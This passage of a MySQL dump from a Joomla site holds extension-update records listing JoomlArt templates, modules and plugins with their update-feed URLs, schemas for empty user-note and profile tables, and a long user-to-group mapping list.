Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml',''),(3913,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.7.1','','http://getk2.org/update.xml',''),(3914,11,0,0,'JA K2 Filter Package for J25 & J3.x','','com_jak2filter','component','',0,'1.2.6','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3915,11,0,0,'JA Megafilter Component','','com_jamegafilter','component','',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/com_jamegafilter.xml',''),(3916,11,0,0,'JA Appolio Theme for EasyBlog','','easyblog_theme_appolio','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_appolio.xml',''),(3917,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3918,11,0,0,'Theme Fixel for Easyblog J25 & J3x','','easyblog_theme_fixel','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_fixel.xml',''),(3919,11,0,0,'JA Muzic Theme for EasyBlog','','easyblog_theme_muzic','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_muzic.xml',''),(3920,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3921,11,0,0,'JA Appolio Template','','ja_appolio','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_appolio.xml',''),(3922,11,0,0,'JA Argo Template for J3x','','ja_argo','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_argo.xml',''),(3923,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3924,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3925,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3926,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3927,11,0,0,'JA Mitius Template','','ja_mitius','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_mitius.xml',''),(3928,11,0,0,'JA Nex T3 Template','','ja_nex_t3','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_nex_t3.xml',''),(3929,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(3930,11,0,0,'JA Onepage Template','','ja_onepage','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_onepage.xml',''),(3931,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(3932,11,0,0,'JA Smashboard Template','','ja_smashboard','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_smashboard.xml',''),(3933,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(3934,11,0,0,'JA Teline IV T3 Template','','ja_teline_iv_t3','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_teline_iv_t3.xml',''),(3935,11,0,0,'Kunena theme for JA Nex T3','','kunena_theme_nex_t3','custom','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j16/kunena_theme_nex_t3.xml',''),(3936,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(3937,11,0,0,'JA Accordion Module for J25 & J34','','mod_jaaccordion','module','',0,'2.6.0','','http://update.joomlart.com/service/tracking/j16/mod_jaaccordion.xml',''),(3938,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(3939,11,0,0,'JA K2 Filter Module for J25 & J3.x','','mod_jak2filter','module','',0,'1.2.6','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(3940,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(3941,11,0,0,'JA Bookmark plugin for J3.x','','plg_jabookmark','plugin','plg_jabookmark',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_jabookmark.xml',''),(3942,11,0,0,'JA Megafilter Virturemart Plugin','','virtuemart','plugin','jamegafilter',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/plg_jamegafilter_virtuemart.xml',''),(3943,11,0,0,'JA System Google Map plugin for Joomla 2.5 & J3.x','','jagooglemap','plugin','system',0,'2.6.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jagooglemap.xml',''),(3944,11,0,0,'JA Megafilter Plugin','','jamegafilter','plugin','system',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/plg_system_jamegafilter.xml',''),(3945,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(3946,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(3947,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(3948,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(3949,11,0,0,'Backend Template','','backend_template_package','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j30/backend_template_package.xml',''),(3950,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(3951,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(3952,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(3953,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(3954,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(3955,11,0,0,'JA Brickstore Template','','ja_brickstore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_brickstore.xml',''),(3956,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(3957,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(3958,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(3959,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(3960,11,0,0,'JA Fixel Template','','ja_fixel','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_fixel.xml',''),(3961,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(3962,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(3963,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(3964,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(3965,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(3966,11,0,0,'JA Muzic Template for J25 & J3x','','ja_muzic','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j31/ja_muzic.xml',''),(3967,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(3968,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(3969,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(3970,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(3971,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(3972,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(3973,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(3974,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(3975,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(3976,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(3977,11,0,0,'Theme Fixel for JShopping J25 & J3x','','jshopping_theme_fixel','custom','',0,'1.0.6','','http://update.joomlart.com/service/tracking/j31/jshopping_theme_fixel.xml',''),(3978,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(3979,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(3980,11,0,0,'JA Google Analytics','','mod_jagoogle_analytics','module','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/mod_jagoogle_analytics.xml',''),(3981,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(3982,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(3983,11,0,0,'Purity III Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml',''),(3984,11,0,0,'JA K2 Filter Package for J25 & J3.x','','com_jak2filter','component','',0,'1.2.6','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3985,11,0,0,'JA Megafilter Component','','com_jamegafilter','component','',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/com_jamegafilter.xml',''),(3986,11,0,0,'JA Appolio Theme for EasyBlog','','easyblog_theme_appolio','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_appolio.xml',''),(3987,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3988,11,0,0,'Theme Fixel for Easyblog J25 & J3x','','easyblog_theme_fixel','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_fixel.xml',''),(3989,11,0,0,'JA Muzic Theme for EasyBlog','','easyblog_theme_muzic','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_muzic.xml',''),(3990,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3991,11,0,0,'JA Appolio Template','','ja_appolio','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_appolio.xml',''),(3992,11,0,0,'JA Argo Template for J3x','','ja_argo','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_argo.xml',''),(3993,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3994,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3995,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3996,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3997,11,0,0,'JA Mitius Template','','ja_mitius','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_mitius.xml',''),(3998,11,0,0,'JA Nex T3 Template','','ja_nex_t3','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_nex_t3.xml',''),(3999,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(4000,11,0,0,'JA Onepage Template','','ja_onepage','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_onepage.xml',''),(4001,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(4002,11,0,0,'JA Smashboard Template','','ja_smashboard','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_smashboard.xml',''),(4003,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(4004,11,0,0,'JA Teline IV T3 Template','','ja_teline_iv_t3','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j16/ja_teline_iv_t3.xml',''),(4005,11,0,0,'Kunena theme for JA Nex T3','','kunena_theme_nex_t3','custom','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j16/kunena_theme_nex_t3.xml',''),(4006,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(4007,11,0,0,'JA Accordion Module for J25 & J34','','mod_jaaccordion','module','',0,'2.6.0','','http://update.joomlart.com/service/tracking/j16/mod_jaaccordion.xml',''),(4008,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(4009,11,0,0,'JA K2 Filter Module for J25 & J3.x','','mod_jak2filter','module','',0,'1.2.6','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(4010,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(4011,11,0,0,'JA Bookmark plugin for J3.x','','plg_jabookmark','plugin','plg_jabookmark',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_jabookmark.xml',''),(4012,11,0,0,'JA Megafilter Virturemart Plugin','','virtuemart','plugin','jamegafilter',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/plg_jamegafilter_virtuemart.xml',''),(4013,11,0,0,'JA System Google Map plugin for Joomla 2.5 & J3.x','','jagooglemap','plugin','system',0,'2.6.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jagooglemap.xml',''),(4014,11,0,0,'JA Megafilter Plugin','','jamegafilter','plugin','system',0,'1.0.0 Beta','','http://update.joomlart.com/service/tracking/j16/plg_system_jamegafilter.xml',''),(4015,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(4016,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(4017,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(4018,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(4019,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(4020,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(4021,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(4022,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(4023,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(4024,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(4025,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(4026,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(4027,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(4028,11,0,0,'JA Fixel Template','','ja_fixel','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_fixel.xml',''),(4029,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(4030,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(4031,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(4032,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(4033,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(4034,11,0,0,'JA Muzic Template for J25 & J3x','','ja_muzic','template','',0,'1.1.3','','http://update.joomlart.com/service/tracking/j31/ja_muzic.xml',''),(4035,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(4036,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(4037,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(4038,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(4039,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(4040,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(4041,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(4042,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(4043,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(4044,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(4045,11,0,0,'Theme Fixel for JShopping J25 & J3x','','jshopping_theme_fixel','custom','',0,'1.0.6','','http://update.joomlart.com/service/tracking/j31/jshopping_theme_fixel.xml',''),(4046,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(4047,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(4048,11,0,0,'JA Google Analytics','','mod_jagoogle_analytics','module','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/mod_jagoogle_analytics.xml',''),(4049,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(4050,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(4051,11,0,0,'Purity III Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml','');
/*!40000 ALTER TABLE `xyhmu_updates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_user_notes`
--

DROP TABLE IF EXISTS `xyhmu_user_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_user_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(100) NOT NULL DEFAULT '',
  `body` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_user_notes`
--

LOCK TABLES `xyhmu_user_notes` WRITE;
/*!40000 ALTER TABLE `xyhmu_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_user_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_user_profiles`
--

DROP TABLE IF EXISTS `xyhmu_user_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_user_profiles` (
  `user_id` int(11) NOT NULL,
  `profile_key` varchar(100) NOT NULL,
  `profile_value` varchar(255) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_user_profiles`
--

LOCK TABLES `xyhmu_user_profiles` WRITE;
/*!40000 ALTER TABLE `xyhmu_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_user_usergroup_map`
--

DROP TABLE IF EXISTS `xyhmu_user_usergroup_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_user_usergroup_map` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id',
  PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_user_usergroup_map`
--

LOCK TABLES `xyhmu_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `xyhmu_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `xyhmu_user_usergroup_map` VALUES (135,8),(389,2),(390,2),(391,2),(392,2),(393,2),(394,2),(395,2),(396,2),(397,2),(398,2),(399,2),(400,2),(401,2),(402,2),(403,2),(404,2),(405,2),(406,2),(407,2),(408,2),(409,2),(410,2),(411,2),(412,2),(413,2),(414,2),(415,2),(416,2),(417,2),(418,2),(419,2),(420,2),(421,2),(422,2),(423,2),(424,2),(425,2),(426,2),(427,2),(428,2),(429,2),(430,2),(431,2),(432,2),(433,2),(434,2),(435,2),(436,2),(437,2),(438,2),(439,2),(440,2),(441,2),(442,2),(443,2),(444,2),(445,2),(446,2),(447,2),(448,2),(449,2),(450,2),(451,2),(452,2),(453,2),(454,2),(455,2),(456,2),(457,2),(458,2),(459,2),(460,2),(461,2),(462,2),(463,2),(464,2),(465,2),(466,2),(467,2),(468,2),(469,2),(470,2),(471,2),(472,2),(473,2),(474,2),(475,2),(476,2),(477,2),(478,2),(479,2),(480,2),(481,2),(482,2),(483,2),(484,2),(485,2),(486,2),(487,2),(488,2),(489,2),(490,2),(491,2),(492,2),(493,2),(494,2),(495,2),(496,2),(497,2),(498,2),(499,2),(500,2),(501,2),(502,2),(503,2),(504,2),(505,2),(506,2),(507,2),(508,2),(509,2),(510,2),(511,2),(512,2),(513,2),(514,2),(515,2),(516,2),(517,2),(518,2),(519,2),(520,2),(521,2),(522,2),(523,2),(524,2),(525,2),(526,2),(527,2),(528,2),(529,2),(530,2),(531,2),(532,2),(533,2),(534,2),(535,2),(536,2),(537,2),(538,2),(539,2),(540,2),(541,2),(542,2),(543,2),(544,2),(545,2),(546,2),(547,2),(548,2),(549,2),(550,2),(551,2),(552,2),(553,2),(554,2),(555,2),(556,2),(557,2),(558,2),(559,2),(560,2),(561,2),(562,2),(563,2),(564,2),(565,2),(566,2),(567,2),(568,2),(569,2),(570,2),(571,2),(572,2),(573,2),(574,2),(575,2),(576,2),(577,2),(578,2),(579,2),(580,2),(581,2),(582,2),(583,2),(584,2),(585,2),(586,2),(587,2),(588,2),(589,2),(590,2),(591,2),(592,2),(593,2),(594,2),(595,2),(596,2),(597,2),(598,2),(599,2),(600,2),(601,2),(602,2),(603,2),(604,2),(605,2),(606,2),(607,2),(608,2),(609,2),(610,2),(611,2),(612,2),(613,2),(614,2),(615,2),(616,2),(617,2),(618,2),(619,2),(620,2),(621,2),(622,2),(623,2),(624,2),(625,2),(626,2),(627,2),(628,2),(629,2),(630,2),(631,2),(632,2),(633,2),(634,2),(635,2),(636,2),(637,2),(638,2),(639,2),(640,2),(641,2),(642,2),(643,2),(644,2),(645,2),(646,2),(647,2),(648,2),(649,2),(650,2),(651,2),(652,2),(653,2),(654,2),(655,2),(656,2),(657,2),(658,2),(659,2),(660,2),(661,2),(662,2),(663,2),(664,2),(665,2),(666,2),(667,2),(668,2),(669,2),(670,2),(671,2),(672,2),(673,2),(674,2),(675,2),(676,2),(677,2),(678,2),(679,2),(680,2),(681,2),(682,2),(683,2),(684,2),(685,2),(686,2),(687,2),(688,2),(689,2),(690,2),(691,2),(692,2),(693,2),(694,2),(695,2),(696,2),(697,2),(698,2),(699,2),(700,2),(701,2),(702,2),(703,2),(704,2),(705,2),(706,2),(707,2),(708,2),(709,2),(710,2),(711,2),(712,2),(713,2),(714,2),(715,2),(716,2),(717,2),(718,2),(719,2),(720,2),(721,2),(722,2),(723,2),(724,2),(725,2),(726,2),(727,2),(728,2),(729,2),(730,2),(731,2),(732,2),(733,2),(734,2),(735,2),(736,2),(737,2),(738,2),(739,2),(740,2),(741,2),(742,2),(743,2),(744,2),(745,2),(746,2),(747,2),(748,2),(749,2),(750,2),(751,2),(752,2),(753,2),(754,2),(755,2),(756,2),(757,2),(758,2),(759,2),(760,2),(761,2),(762,2),(763,2),(764,2),(765,2),(766,2),(767,2),(768,2),(769,2),(770,2),(771,2),(772,2),(773,2)